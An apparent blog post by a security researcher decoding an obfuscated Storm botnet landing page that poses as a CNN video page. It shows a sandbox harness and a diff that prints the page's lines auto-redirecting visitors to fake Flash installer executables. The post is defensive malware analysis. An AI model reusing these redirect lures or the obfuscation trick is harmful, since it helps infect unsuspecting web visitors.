Storm botnet landing page - Obfuscated CNN splash page

This obfuscated page has been all the rage since August 7 (it replaced the non-obfuscated CNN page). It would appear that it has been replaced by a new non-obfuscated version including a popup with a fake virus scanner, as of August 11th.

After the replacement, they went back and rewrote many of the hijacked servers with this version, so that this page and the original faux-CNN page look interleaved.

As always, the original file can be seen in the archived page viewer.

I used my monkeywrench tool on this -- that sounds pretty cool until you realize that the tool is mostly vapor. All it really means is that I'm collecting some tricks into a Perl script so I don't have to remember them every time there's something to deobfuscate. (And eventually, the idea is to be able to get to those tools online, but right now it's command-line and duct tape all the way.)

If you unpack that script into a handy environment which can run it, and pretty print the Javascript to get a little better idea what it's doing, you get this:

// Monkeywrench run Thu Aug  7 18:57:24 2008
// -----------------------------------------------
// Set up a document object
// -----------------------------------------------
function my_location() {
   this.href = "";
}
function my_document() {
   this.location = new my_location();
   this.url = "";

   this.write = function(string) {
      print(string);
   }
};
function my_window() {
   this.something = '';
}

function eval(something) {
   print(something);
}

var document = new my_document();
var location = new my_location();
var window = new my_window();

var U7 = window,
W8 = document;
var a1 = "%20%3C%21DOCTYPE%20HTML%20 [snip snip] /html%3E%0A";
function V0() {                                                                                                                                                  var V0;                                                                                                                                                       V0 = unescape(a1);                                                                                                                                            W8.write(V0);                                                                                                                                              }                                                                                                                                                             V0();

And if you run that Javascript, you get almost exactly yesterday's page. But it is slightly different; if you run diff between this output and yesterday's page, you get this:

11c11
< <title>Video - Breaking News Videos from CNN.com</title>
---
> <title>Breaking News Videos from CNN.com</title>
51c51
<               window.setTimeout("location.href='get_flash_update.exe'", 3000);
---
>               window.setTimeout("location.href='adobe_flash.exe'", 3000);
186c186
<         case "iax": document.location.href="get_flash_update.exe"; break;
---
>         case "iax": document.location.href="adobe_flash.exe"; break;
194c194
<               location.href="get_flash_update.exe";
---
>               location.href="adobe_flash.exe";
514c514
< <a href="get_flash_update.exe">
---
> <a href="adobe_flash.exe">

They've changed the title, which is uninteresting. But they've changed the name of the executable. And my guess is they've obfuscated the page to slow down efforts to detect that change.

I don't have any real tools (or time) to investigate binary files, but I have just now retrieved these two binaries myself from infected servers, and they have the same length, but different content. I can provide the files in question upon request.